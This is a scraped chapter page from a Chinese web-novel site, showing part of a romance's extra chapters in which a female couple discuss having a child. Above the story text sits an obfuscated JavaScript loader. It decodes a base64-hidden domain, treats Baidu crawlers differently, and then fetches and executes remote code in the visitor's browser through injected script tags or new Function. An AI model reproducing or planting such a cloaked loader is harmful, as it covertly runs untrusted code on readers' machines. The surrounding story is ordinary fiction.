98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(10(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

什么事?盛雪声音里的气压开始变低了,妈妈有一点生气了哦。

我再和若若说句话。可不可以?泪眼汪汪的。

盛雪无奈:好吧,就一句,已经很打扰了,知道吗?

谢文聘点点头,小爪子伸出窗外,朝宋若招了招手,若若阿姨,你过来一下。

在长辈面前称呼又变成了若若阿姨,她倒是很机灵。

若若走过来,用眼神询问,谢文聘继续招手,示意她再低一点。若若俯下身,绾绾头发,小朋友趴在她耳朵边轻轻说:我可不可以提一个请求。

嗯?若若弯弯眼睛,喷在耳廓上的呼吸温热湿润。

谢文聘两个眼圈儿红红的,用只有两个人听见的声音说:明年夏天我也要来和你住。说完了,好像受不了,生怕被拒绝似的,快速地啄了她一下,扭过脸去再也不看她。

晚上两个人在被窝里卿卿我我。但凡很久不见,若若总要暂时颠覆矜持的形象,用同等的热情来回应孟璟。孟璟觉得,今天虽说同样是小别,太太的兴致却并不高,甚至很有点沉默,这些都算了,第二次亲到胸口的时候,小药瓶子还是没多大反应,孟璟就不乐意了,顿住了,居高临下灼灼地凝视着她。

若若察觉到异样,从那种半失神的状态里清醒过来,双手抱住她脖子,眨巴着一双波光潋滟的眼。

孟璟刮刮她挺秀的鼻梁,想什么?

若若歪头躲了躲,不理。

孟璟于是歪着头,勾唇轻笑,我猜猜,该不会,给人家带了几天孩子,想要个自己的了吧?

若若依然没说话,但是手柔柔地挪过来,捧着她的脸,亲了一亲。

咦,是真的啊?孟璟好笑,压低声音咬耳朵,那,今晚咱们就生一个。

第114章 番外4

好事多磨。两个人拥有小包子这件事个中的曲折都够写成一本书了。

起先孟璟并没有把老婆的反应当真,所谓今晚就生一个之类的戏言,只是一种闺阁乐趣,在她看来,宋若若温柔又心软,和小谢相处了两天,就产生了羁绊,恋恋不舍,误以为自己想要小孩子了,现在的她,还沉浸在和小朋友相处的愉悦之中,身体里有类似多巴胺的成分,过个几天,等荷尔蒙退潮,她恢复理智冷静的本色,这个决定就不再见得有效。

所以这晚过了之后,她就没往下追问。

再度提起这茬,是半个月之后的事情了,若若有新的拍摄任务,晚间视频的时候,第一句话就是:鲸鱼,我们要一个吧。

啊?反而是孟璟丈二的和尚摸不着头脑,要一个?什么?

孩子。

以这个世界的科学水平,一对女性想要繁衍共同的后代,并不算是一个难题,目前医学界花大力气研究的,是如何在此过程中删除取卵这个步骤,有望在未来十年内用体细胞诱变成生殖细胞。目前却还是无可避免,哪怕不是孕母方,也要受一定程度的苦楚。

孟璟一早想好了,反正这个孕她来怀。就算一贯稳重成熟的老婆,这件事上是一时头脑发热,过了点儿又不想带孩子了,那也没问题,这不有她呢嘛。因此她没有细问缘由,只要是若若想做的事情,她就奉陪。到点提前联络好医院,安排好行程,陪太太前往。

她们找的是谢文聘诞生的那家医院。

巧的是,林尽染是那里的在读博士,得知她们过去,立马一百二十万分热情地接待,虽然不由她亲自负责,但是从中牵线,给她们介绍自己的导师。

做了初步检查之后,那位欧阳医生让两个人决定谁来担当孕母。

大鲸鱼立马拍着胸脯,说这事是她当仁不让的。

若若却对医生说,还需要考虑一下,拉着孟璟暂时离开了医生办公室。

两个人在医院的楼下坐着喝咖啡,春天已经来了,隔壁的大学校园有大片花树,风一过,盈盈的花瓣越过白玉般的围墙,洋洋洒洒地飘落。坐了不一会儿,就落了一头一身。孟璟一只手替身边人拂拭,一面听若若说道:不是一件小事,不像你为我倒杯水那么简单,很辛苦的。贸贸然决定你来,过于草率了,我们一起检查,看看谁更适合。

这哪还用得着商量。孟璟拉着她的手,首先,孩子是我想要的,至少是我先起的头,那怀孕当然应该由我来啦,再说我的工作待家里弄没问题,顶多开会都改成视频会议,就是几个月不出现,也无所谓,有人帮我打理,但老婆你就不一样了,要是肚子里装个小宝宝,你喜欢的戏可就都没法儿接了。

若若说:不能这么

孟璟难得打断她的话:你敢说,你的工作对你不重要?你能想象全职妈妈的生活吗,哪怕就十个月?

若若听了,露出沉思的神色,应该是真的在脑海里构建那画面。孟璟唇角勾勒出笑意,凑过去,揽着肩,在她额头亲了亲:乖啦乖啦,我的小傻瓜,别担心,没问题的。

孟璟额外做了全身检查,领了一堆调理的药剂回家。

若若接到时装周的邀请,飞了一趟巴黎。她忙忙地来回。

然而,回家却见到一个比以往沉静了好几倍的大鲸鱼。开了门,也不见她来迎接,默默地坐在落地窗前,发着呆。

若若诧异,难道真的是,要做准妈妈的人,性子沉淀下来了?一步步朝她走近,试探性地喊:孟璟?

鲸鱼缓缓侧了侧身子,挤出来一个笑:回来啦。

平日里早就冲上来又亲又抱的人,仿佛对她的出现感到一丝意外。宋若过去揉了揉她的头。鲸鱼就势搂着她,脸埋在胸前,一声不吭。

受了委屈时就会这样儿。

若若不动声色地让她抱着。

饭桌上,孟璟开了腔,说了一大篇话,若若总结提炼了一下,大意就是这个孩子还是不做了,要放弃。

若若放下筷子,皱眉,问:为什么呢?

孟璟勾唇笑:害怕她会分走老婆的宠爱。到时候我叫天天不应的,你也不理我,只顾疼着她。我要一辈子独占你。

这话是有诚意的,宋若相信孟璟内心深处曾经真的这样考虑过。但是这很明显不是这个问题的答案,鲸鱼是在掩饰着什么,因此再问了一句:为什么?

孟璟努努嘴:就,这几天我看了一些育儿视频呀,觉得带孩子还是太麻烦了。整天哇哇大哭的。吵都吵死了。我要一个人做老婆的孩子。

宋若还要说话,孟璟抢先微笑地补充:老婆大人,你看,这些年我是不是都很乖,都很听老婆话?没有怎么任性过?这次你就听我的好不好?让我任性一下吧。我这几天想得很清楚,我的世界,只要有我和你和你和我就够了。

若若看看她,当时也没有再说什么,只说先吃饭。

次日才约谈了上次的医生。

实在不是她要瞒着孟璟来打探,只因为孟璟的反应太奇怪了,上次做检查的时候还一脸兴致勃勃,显得那样兴奋,她离开家的那天早晨,孟璟还按时吃叶酸那些个,送她上飞机之前还说以后要一家三口一起出去旅行,怎么一转眼就变卦,说不要了。鲸鱼不是那种遇到困难就放弃的人。一定是有什么非常难以言喻的意外发生。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间